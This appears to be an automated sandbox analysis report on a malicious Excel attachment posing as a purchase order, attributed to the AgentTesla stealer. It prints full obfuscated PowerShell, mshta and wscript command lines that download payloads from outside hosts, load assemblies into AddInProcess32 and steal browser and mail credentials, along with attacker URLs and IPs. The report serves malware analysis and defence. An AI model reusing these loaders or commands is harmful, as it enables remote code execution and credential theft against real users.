'kcdecdnpbwfnzvvybca9ieyxbwh0dhbzoi8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9micrj0fhx2jxbzlszxu0nxq3qluxa1znc2q5cfq5cgdtu2x2u3rhcm5usunmrmgnkydtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9zmq0zjyxngjimja5yzyyyze3mza5nduxnzzhmdkwngygrjfto0rwm3dljysnyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7rhazaw1hz2vcexrlcya9ierwm3dlyknsawvudccrjy5eb3cnkydubg9hzerhdgeorhazaw1hzycrj2vvcicrj2wpo0rwm2ltywdlvgv4jysndca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkerwm2ltywdlqnl0zxmpo0rwm3n0yxj0rmxhzya9ieyxbtwnkyc8qkftrty0x1nuqvjupj5gmw0nkyc7rhazzw5krmxhzya9ieyxbtw8qkftrty0x0vord4+rjfto0rwm3n0yxj0sscrj25kzxggpsbecdnpbwfnzvrlehqusw5kzxhpzihecdnzdgfydezsywcpo0rwm2vuzeluzgunkyd4id0grhazaw1hz2vuzxh0lkluzgv4t2yorhazzw4nkydkjysnrmxhzyk7rhazc3rhcnrjbmrlecatjysnz2ugmcatyw5kierwm2vuzeluzgv4ic1njysndcbecdnzdgfydeluzgv4o0rwm3n0yxj0sw5kzxggkz0grhazc3rhcnqnkydgjysnbgfnlkxlbmd0adtecdniyxnlnjrmzw5ndgggpsbecdnlbmrjbmrlecatierwm3n0yxj0sw5kzxg7rhazymfzjysnzty0q29tbwfuzca9ierwm2ltywdlvgv4dc5tdwjzdhjpbmcorhazc3rhcnrjbmrlecwgrhazymfzzty0tgvuz3rokttecdniyxnlnjrszxzlcicrj3nlzca9ic1qb2luichecdniyxnlnjrdb21tyw5kllrvq2gnkydhckfyjysncmf5kckgntl0iezvckvhy2gtt2jqzwn0ihsgrhazxyb9kvstms4ulscrjyhecdniyxnlnjrdb21tyscrj25klkxlbmd0acldo0rwm2nvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbicrj2cojysnrhazyicrj2fzzty0umv2zxjzzwqpo0rwm2xvywqnkydlzefzc2vtymx5id0gw1n5c3rlbs5szwzszscrj2n0aw9ulkfzc2vtymx5xscrjzo6tg9hzchecdnjb21tyw5kqnl0zxmpo0rwm3zhau1ldghvzccrjya9jysniftkjysnbmxpyi5jty5ib21lxs5hzxrnzxrob2qorjftvkfjrjftkttecdn2ywlnzxrob2qusw52bycrj2tlkerwm251bgwsieaorjftdhh0lkzsrkzsvy8yntmvmzeumjiumy4yotevlzpwdhrorjftlcbgmw1kzxnhdgl2ywrvrjftlcbgjysnmw1kzxnhdgl2ywrvrjftlcbgmw1kzxnhdgl2ywrvrjftlcbgmw1bzgrjblankydyb2nlc3mzjysnmkyxbswgrjftzgvzyxrpdmfkb0yxbswgrjftzgvzyxrpdmfkb0yxbsxgmw1kzxnhdgl2ywrvrjftleyxbwrlc2f0axzhzg9gmscrj20srjftjysnzgvzyxrpdmfkb0yxbsxgmw1kzxnhdgl2ywrvrjftlccrj0yxbwrlc2f0axzhzg9gmw0srjftmuyxbsxgmw1kzxnhdgl2ywrvrjftksk7jykuukvwbgfjzsgow2noyvjdnzarw2noyvjdndkrw2noyvjdmta5ksxbc1rssu5nxvtjagfsxtm5ks5srxbsywnlkchby2hhul02octby2hhul0xmtirw2noyvjdnteplcckjykuukvwbgfjzsgow2noyvjdntmrw2noyvjdntcrw2noyvjdmte2ksxbc1rssu5nxvtjagfsxteyncl8ic4okedldc1wqvjjywjmrsankm1kcionks5oyw1lwzmsmtesml0tsm9pticnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('dp3imageurl = f1mhttps://1017.filemail.com/api/file/get?filekey=2'+'aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnticffh'+'mtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb209c62c1730945176a0904f f1m;dp3we'+'bclient = new-object system.net.webclient;dp3imagebytes = dp3webclient'+'.dow'+'nloaddata(dp3imag'+'eur'+'l);dp3imagetex'+'t = [system.text.encoding]::utf8.getstring(dp3imagebytes);dp3startflag = f1m<'+'<base64_start>>f1m'+';dp3endflag = f1m<<base64_end>>f1m;dp3starti'+'ndex = dp3imagetext.indexof(dp3startflag);dp3endinde'+'x = dp3imagetext.indexof(dp3en'+'d'+'flag);dp3startindex -'+'ge 0 -and dp3endindex -g'+'t dp3startindex;dp3startindex += dp3start'+'f'+'lag.length;dp3base64length = dp3endindex - dp3startindex;dp3bas'+'e64command = dp3imagetext.substring(dp3startindex, dp3base64length);dp3base64rever'+'sed = -join (dp3base64command.toch'+'arar'+'ray() 59t foreach-object { dp3_ })[-1..-'+'(dp3base64comma'+'nd.length)];dp3commandbytes = [system.convert]::frombase64strin'+'g('+'dp3b'+'ase64reversed);dp3load'+'edassembly = [system.refle'+'ction.assembly]'+'::load(dp3commandbytes);dp3vaimethod'+' ='+' [d'+'nlib.io.home].getmethod(f1mvaif1m);dp3vaimethod.invo'+'ke(dp3null, @(f1mtxt.frffrw/253/31.22.3.291//:ptthf1m, f1mdesativadof1m, f'+'1mdesativadof1m, f1mdesativadof1m, f1maddinp'+'rocess3'+'2f1m, f1mdesativadof1m, f1mdesativadof1m,f1mdesativadof1m,f1mdesativadof1'+'m,f1m'+'desativadof1m,f1mdesativadof1m,'+'f1mdesativadof1m,f1m1f1m,f1mdesativadof1m));').replace(([char]70+[char]49+[char]109),[string][char]39).replace(([char]68+[char]112+[char]51),'$').replace(([char]53+[char]57+[char]116),[string][char]124)\| .((get-variable 'mdr').name[3,11,2]-join'')"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jgsgicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagyurklxrzcgugicagicagicagicagicagicagicagicagicagicagicattwvtqmvyrevgaw5jvglvbiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtt04ilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbkq2jwy2n4dvfrbsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbjek1tlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagifppdmrucfysdwludcagicagicagicagicagicagicagicagicagicagicagigzveuzic2dozsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbrvu96sgnmbhp5ktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaizgzciiagicagicagicagicagicagicagicagicagicagicagic1oyu1fc1bbq2ugicagicagicagicagicagicagicagicagicagicagicbiu2jmb1zwbiagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakazo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze5mi4zljiyljezl3hhbxbwl3nll3nlzxrozwjlc3r0agluz3nlbnrpcmv0aw1ld2l0agdyzwf0dghpbmdzd2l0agxvdmvya2lzcy50suyilcikrw5wokfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0agluz3n3axrobg92zxjraxmudmjtiiwwldapo1nuyvj0lxnszuvwkdmpo2lfecagicagicagicagicagicagicagicagicagicagicagicikru5wokfquerbvefcc2vldghlymvzdhroaw5nc2vudglyzxrpbwv3axroz3jlyxr0agluz3n3axrobg92zxjraxmudmjtig=='+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdecdnpbwfnzvvybca9ieyxbwh0dhbzoi8vmtaxny5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9micrj0fhx2jxbzlszxu0nxq3qluxa1znc2q5cfq5cgdtu2x2u3rhcm5usunmrmgnkydtvetqm0xdnlnrdeljt2nfvdm1dyzwa192awq9zmq0zjyxngjimja5yzyyyze3mza5nduxnzzhmdkwngygrjfto0rwm3dljysnyknsawvudca9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7rhazaw1hz2vcexrlcya9ierwm3dlyknsawvudccrjy5eb3cnkydubg9hzerhdgeorhazaw1hzycrj2vvcicrj2wpo0rwm2ltywdlvgv4jysndca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkerwm2ltywdlqnl0zxmpo0rwm3n0yxj0rmxhzya9ieyxbtwnkyc8qkftrty0x1nuqvjupj5gmw0nkyc7rhazzw5krmxhzya9ieyxbtw8qkftrty0x0vord4+rjfto0rwm3n0yxj0sscrj25kzxggpsbecdnpbwfnzvrlehqusw5kzxhpzihecdnzdgfydezsywcpo0rwm2vuzeluzgunkyd4id0grhazaw1hz2vuzxh0lkluzgv4t2yorhazzw4nkydkjysnrmxhzyk7rhazc3rhcnrjbmrlecatjysnz2ugmcatyw5kierwm2vuzeluzgv4ic1njysndcbecdnzdgfydeluzgv4o0rwm3n0yxj0sw5kzxggkz0grhazc3rhcnqnkydgjysnbgfnlkxlbmd0adtecdniyxnlnjrmzw5ndgggpsbecdnlbmrjbmrlecatierwm3n0yxj0sw5kzxg7rhazymfzjysnzty0q29tbwfuzca9ierwm2ltywdlvgv4dc5tdwjzdhjpbmcorhazc3rhcnrjbmrlecwgrhazymfzzty0tgvuz3rokttecdniyxnlnjrszxzlcicrj3nlzca9ic1qb2luichecdniyxnlnjrdb21tyw5kllrvq2gnkydhckfyjysncmf5kckgntl0iezvckvhy2gtt2jqzwn0ihsgrhazxyb9kvstms4ulscrjyhecdniyxnlnjrdb21tyscrj25klkxlbmd0acldo0rwm2nvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbicrj2cojysnrhazyicrj2fzzty0umv2zxjzzwqpo0rwm2xvywqnkydlzefzc2vtymx5id0gw1n5c3rlbs5szwzszscrj2n0aw9ulkfzc2vtymx5xscrjzo6tg9hzchecdnjb21tyw5kqnl0zxmpo0rwm3zhau1ldghvzccrjya9jysniftkjysnbmxpyi5jty5ib21lxs5hzxrnzxrob2qorjftvkfjrjftkttecdn2ywlnzxrob2qusw52bycrj2tlkerwm251bgwsieaorjftdhh0lkzsrkzsvy8yntmvmzeumjiumy4yotevlzpwdhrorjftlcbgmw1kzxnhdgl2ywrvrjftlcbgjysnmw1kzxnhdgl2ywrvrjftlcbgmw1kzxnhdgl2ywrvrjftlcbgmw1bzgrjblankydyb2nlc3mzjysnmkyxbswgrjftzgvzyxrpdmfkb0yxbswgrjftzgvzyxrpdmfkb0yxbsxgmw1kzxnhdgl2ywrvrjftleyxbwrlc2f0axzhzg9gmscrj20srjftjysnzgvzyxrpdmfkb0yxbsxgmw1kzxnhdgl2ywrvrjftlccrj0yxbwrlc2f0axzhzg9gmw0srjftmuyxbsxgmw1kzxnhdgl2ywrvrjftksk7jykuukvwbgfjzsgow2noyvjdnzarw2noyvjdndkrw2noyvjdmta5ksxbc1rssu5nxvtjagfsxtm5ks5srxbsywnlkchby2hhul02octby2hhul0xmtirw2noyvjdnteplcckjykuukvwbgfjzsgow2noyvjdntmrw2noyvjdntcrw2noyvjdmte2ksxbc1rssu5nxvtjagfsxteyncl8ic4okedldc1wqvjjywjmrsankm1kcionks5oyw1lwzmsmtesml0tsm9pticnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('dp3imageurl = f1mhttps://1017.filemail.com/api/file/get?filekey=2'+'aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnticffh'+'mtkj3lc6sqticoc_t35w&pk_vid=fd4f614bb209c62c1730945176a0904f f1m;dp3we'+'bclient = new-object system.net.webclient;dp3imagebytes = dp3webclient'+'.dow'+'nloaddata(dp3imag'+'eur'+'l);dp3imagetex'+'t = [system.text.encoding]::utf8.getstring(dp3imagebytes);dp3startflag = f1m<'+'<base64_start>>f1m'+';dp3endflag = f1m<<base64_end>>f1m;dp3starti'+'ndex = dp3imagetext.indexof(dp3startflag);dp3endinde'+'x = dp3imagetext.indexof(dp3en'+'d'+'flag);dp3startindex -'+'ge 0 -and dp3endindex -g'+'t dp3startindex;dp3startindex += dp3start'+'f'+'lag.length;dp3base64length = dp3endindex - dp3startindex;dp3bas'+'e64command = dp3imagetext.substring(dp3startindex, dp3base64length);dp3base64rever'+'sed = -join (dp3base64command.toch'+'arar'+'ray() 59t foreach-object { dp3_ })[-1..-'+'(dp3base64comma'+'nd.length)];dp3commandbytes = [system.convert]::frombase64strin'+'g('+'dp3b'+'ase64reversed);dp3load'+'edassembly = [system.refle'+'ction.assembly]'+'::load(dp3commandbytes);dp3vaimethod'+' ='+' [d'+'nlib.io.home].getmethod(f1mvaif1m);dp3vaimethod.invo'+'ke(dp3null, @(f1mtxt.frffrw/253/31.22.3.291//:ptthf1m, f1mdesativadof1m, f'+'1mdesativadof1m, f1mdesativadof1m, f1maddinp'+'rocess3'+'2f1m, f1mdesativadof1m, f1mdesativadof1m,f1mdesativadof1m,f1mdesativadof1'+'m,f1m'+'desativadof1m,f1mdesativadof1m,'+'f1mdesativadof1m,f1m1f1m,f1mdesativadof1m));').replace(([char]70+[char]49+[char]109),[string][char]39).replace(([char]68+[char]112+[char]51),'$').replace(([char]53+[char]57+[char]116),[string][char]124)\| .((get-variable 'mdr').name[3,11,2]-join'')"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.641003530.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 2228, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.643424873.0000000002355000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.641003530.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 2228, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.641003530.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 2228, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	121 Scripting	Valid Accounts	231 Windows Management Instrumentation	121 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	23 Exploitation for Client Execution	1 DLL Side-Loading	211 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	35 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	121 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	11 Obfuscated Files or Information	Security Account Manager	531 Security Software Discovery	SMB/Windows Admin Shares	11 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	4 PowerShell	Login Hook	Login Hook	1 Install Root Certificate	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	261 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	261 Virtualization/Sandbox Evasion	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	26%	ReversingLabs	Win32.Exploit.CVE-2017-0199
Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	100%	Avira	TR/AVI.Agent.xoswb
Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\~DFC601DD9C0FBA6613.TMP	100%	Avira	TR/AVI.Agent.xoswb

Source	Detection	Scanner	Label
http://192.3.22.13/xampp/se/seet	0%	Avira URL Cloud	safe
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFC:	0%	Avira URL Cloud	safe
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFdll	0%	Avira URL Cloud	safe
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFp	0%	Avira URL Cloud	safe
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.htarisationM	0%	Avira URL Cloud	safe
https://provit.uk/	0%	Avira URL Cloud	safe
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta	0%	Avira URL Cloud	safe
https://provit.uk/v	0%	Avira URL Cloud	safe
https://1017.filemail.com/api/file/get?filekey=2	0%	Avira URL Cloud	safe
https://provit.uk/wUE3Zl?&temple=standing&steps=overwrought&official=hushed&pressurisation	0%	Avira URL Cloud	safe
https://provit.uk/b	0%	Avira URL Cloud	safe
http://192.3.22.13/	0%	Avira URL Cloud	safe
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta;	0%	Avira URL Cloud	safe
http://192.3.22.13/352/WRFFRF.txt	0%	Avira URL Cloud	safe
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.htaAcC:	0%	Avira URL Cloud	safe
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF	0%	Avira URL Cloud	safe
https://1017.filemail.com/api/file/get?filek	0%	Avira URL Cloud	safe
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta...p	0%	Avira URL Cloud	safe
http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.htahttp://192.3.22.13/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
provit.uk	198.244.140.41	true	false	unknown
ip-api.com	208.95.112.1	true	false	high
ip.1017.filemail.com	142.215.209.78	true	false	high
1017.filemail.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://provit.uk/wUE3Zl?&temple=standing&steps=overwrought&official=hushed&pressurisation	false	Avira URL Cloud: safe	unknown
